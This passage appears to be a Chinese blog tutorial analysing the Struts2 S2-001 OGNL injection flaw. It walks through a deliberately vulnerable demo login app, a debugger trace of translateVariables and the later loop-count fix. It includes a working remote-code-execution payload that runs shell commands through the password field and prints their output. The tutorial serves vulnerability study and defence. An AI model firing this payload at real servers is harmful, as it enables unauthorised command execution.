環境搭建:win10 eclipse ee struts2.0.1 tomcat8
導入最基礎的jar包
web.xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Deployment descriptor for the S2-001 demo (Struts 2.0.1 on Tomcat 8, per the environment note above). -->
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1">
<display-name>S2-001 Example</display-name>
<!-- FilterDispatcher is the Struts 2.0.x front controller. It is mapped to /* below, so every
     request (including the login form submission from index.jsp) passes through Struts and
     its tag rendering, which is where the re-evaluation analysed on this page takes place. -->
<filter>
<filter-name>struts2</filter-name>
<filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
</filter>
<filter-mapping>
<filter-name>struts2</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<!-- index.jsp is both the welcome page and the "error" result target configured in struts.xml. -->
<welcome-file-list>
<welcome-file>index.jsp</welcome-file>
</welcome-file-list>
</web-app>
LoginAction.java
package com.au.demo.action;
import com.opensymphony.xwork2.ActionSupport;
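/**
 * Demo login action used by the S2-001 write-up.
 *
 * <p>Struts populates {@code username} and {@code password} from the form in
 * index.jsp through the setters, then calls {@link #execute()}. Only the fixed
 * demo credentials {@code admin} / {@code password} yield {@code SUCCESS}; every
 * other outcome, including a missing or empty parameter, yields {@code ERROR},
 * which struts.xml maps back to the login form.
 *
 * <p>The hard-coded credentials are a fixture for reproducing the issue, not a
 * login implementation.
 */
public class LoginAction extends ActionSupport {
    private String username = null;
    private String password = null;

    /** @return the submitted username, or {@code null} if the parameter was absent */
    public String getUsername() {
        return this.username;
    }

    /** @return the submitted password, or {@code null} if the parameter was absent */
    public String getPassword() {
        return this.password;
    }

    /** @param username value bound from the {@code username} request parameter */
    public void setUsername(String username) {
        this.username = username;
    }

    /** @param password value bound from the {@code password} request parameter */
    public void setPassword(String password) {
        this.password = password;
    }

    /**
     * Checks the submitted credentials against the demo fixture.
     *
     * @return {@code SUCCESS} for admin/password (username case-insensitive),
     *         otherwise {@code ERROR}
     * @throws Exception never thrown here; retained for the Action contract
     */
    public String execute() throws Exception {
        // A request that omits a parameter never calls the setter, so the field
        // stays null; treat that like an empty value instead of throwing
        // NullPointerException from isEmpty().
        if (isBlank(this.username) || isBlank(this.password)) {
            return ERROR;
        }
        if (this.username.equalsIgnoreCase("admin") && this.password.equals("password")) {
            return SUCCESS;
        }
        return ERROR;
    }

    /** @return true when {@code value} is {@code null} or has no characters */
    private static boolean isBlank(String value) {
        return value == null || value.isEmpty();
    }
}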
index.jsp
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<%-- Login form for the S2-001 demo. It submits username/password to the "login" action
     (LoginAction). On the "error" result struts.xml sends the request back to this page,
     and the Struts tags re-render the previously submitted values. --%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<s:form action="login">
<s:textfield name="username" label="username" />
<%-- The password is rendered with s:textfield, i.e. as plain text that is echoed back on
     the error result. Presumably chosen so the echo path is visible in the demo; real code
     must never write a submitted password back into the page. --%>
<s:textfield name="password" label="password" />
<s:submit></s:submit>
</s:form>
</body>
</html>
struts.xml
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
"http://struts.apache.org/dtds/struts-2.3.dtd">
<!-- Struts configuration for the S2-001 demo. -->
<struts>
<!-- Development mode: enables extra debug output and configuration reloading. Keep it
     off outside a local lab; it exposes internals that production deployments must not. -->
<constant name="struts.devMode" value="true" />
<package name="S2-001" extends="struts-default">
<!-- A failed login ("error") returns to index.jsp, which re-renders the form with the
     submitted values. That re-rendering is the output point analysed on this page. -->
<action name="login" class="com.au.demo.action.LoginAction">
<result name="success">/welcome.jsp</result>
<result name="error">/index.jsp</result>
</action>
</package>
</struts>
導入對應的xwork.jar源碼進行調試(找源碼坑死我了)
有需要的這是本人搭建的環境下載地址:
https://pan.baidu.com/s/1_BBEIfoX-WSjLHQcqstVPA 提取碼:aklq
測試點擊提交:
構造的ognl被執行:
任意代碼執行的POC:
%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()
}
將pwd
替換爲對應的命令,即可執行。
漏洞分析:
漏洞成因:
可執行代碼(ognl(可理解爲代碼)):
在translateVariables方法中,遞歸解析表達式:處理完%{password}後,將password的值直接取出並繼續在while循環中解析;若用戶輸入的password是惡意的ognl表達式,則得以解析執行。
輸入點:可構造惡意參數
輸出點:利用登錄失敗會重新返回頁面並回帶之前的輸入內容
在xwork的jar包下的com.opensymphony.xwork2.util.TextUtils第98行設置斷點,以debug方式啟動tomcat進行單步調試
關鍵代碼:
/**
 * Expands every {@code open}{...} placeholder in {@code expression} against the value
 * stack and returns the converted result.
 *
 * <p>Each pass of the outer loop finds the first opener, locates the matching closer by
 * counting nested braces (inner loop), evaluates the text between them with
 * {@code stack.findValue(var, asType)}, and splices the value into {@code expression}
 * for the next pass.
 *
 * <p>Vulnerability (S2-001): the value obtained from the stack is written back into
 * {@code expression} and the next pass re-scans that string from index 0. A value that
 * itself contains {@code %{...}} -- here the raw {@code password} form parameter echoed
 * by the s:textfield tag -- is therefore treated as a new expression and evaluated.
 * Nothing bounds the number of passes; the patched version shown below adds a loop
 * counter ({@code maxLoopCount}) and breaks once it is exceeded.
 *
 * @param open       marker character preceding "{" (e.g. '%' for %{...})
 * @param expression string to expand; replaced by intermediate results on each pass
 * @param stack      value stack used to evaluate the placeholder contents
 * @param asType     type requested from the stack and from the final conversion
 * @param evaluator  optional post-processor applied to each looked-up value; may be null
 * @return the expanded value after conversion by XWorkConverter to {@code asType}
 */
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
while (true) {
// every pass restarts the search at index 0 of the (possibly rewritten) expression
int start = expression.indexOf(open + "{");
int length = expression.length();
int x = start + 2;
int end;
char c;
int count = 1;
// walk forward from just after "{" until the brace depth returns to zero
while (start != -1 && x < length && count != 0) {
c = expression.charAt(x++);
if (c == '{') {
count++;
} else if (c == '}') {
count--;
}
}
// index of the matching '}' when count reached zero; otherwise just where the scan stopped
end = x - 1;
// only a complete, balanced placeholder is expanded; anything else ends the outer loop
if ((start != -1) && (end != -1) && (count == 0)) {
String var = expression.substring(start + 2, end);
// the placeholder body is evaluated against the stack (OGNL)
Object o = stack.findValue(var, asType);
if (evaluator != null) {
o = evaluator.evaluate(o);
}
String left = expression.substring(0, start);
String right = expression.substring(end + 1);
if (o != null) {
// with no text on the left, result keeps o as an object rather than a String
if (TextUtils.stringSet(left)) {
result = left + o;
} else {
result = o;
}
if (TextUtils.stringSet(right)) {
result = result + right;
}
// the looked-up value is folded back into the string the next pass re-parses;
// this is the step that lets user-supplied %{...} reach the evaluator
expression = left + o + right;
} else {
// the variable doesn't exist, so don't display anything
result = left + right;
expression = left + right;
}
} else {
break;
}
}
return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}
通過對比username和password來進行分析:
順序執行,expression值爲username
多個return遞歸回到該方法,通過 stack.findValue() 得到username的輸入值, 最後aaa 被賦值給 expression
注意這裏和password進行比較~
繼續單步調試再次進入該方法(遞歸解析ognl):不符合while執行118行
此時不符合if條件 if ((start != -1) && (end != -1) && (count == 0))
進入多次return結束對username標籤的執行回顯到頁面上
順序執行,expression值爲password
多個return遞歸回到該方法,通過 stack.findValue() 得到password的輸入值,此時我們輸入password的值 %{3+4} 被賦值給 expression
再次進入該方法,此時爲ognl表示式,符合while條件和if判斷,接下來就順序解析了我們的 %{3+4} expression賦值爲7
進入多次return結束對password標籤的執行回顯到頁面上
漏洞修復:
改變了ognl表達式的解析方法從而不會產生遞歸解析,用戶的輸入也不會再解析執行。
修補後的代碼:增加判斷
if (loopCount > maxLoopCount) {
// translateVariables prevent infinite loop / expression recursive evaluation
break;
}
當解析完一層表達式後,使其不符合上述判斷,不再向下執行,執行break,跳出while(true)循環
源碼(註釋寫的很清楚):
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
int loopCount = 1;
int pos = 0;
while (true) {
int start = expression.indexOf(open + "{", pos);
if (start == -1) {
pos = 0;
loopCount++;
start = expression.indexOf(open + "{");
}
if (loopCount > maxLoopCount) {
// translateVariables prevent infinite loop / expression recursive evaluation
break;
}
int length = expression.length();
int x = start + 2;
int end;
char c;
int count = 1;
while (start != -1 && x < length && count != 0) {
c = expression.charAt(x++);
if (c == '{') {
count++;
} else if (c == '}') {
count--;
}
}
end = x - 1;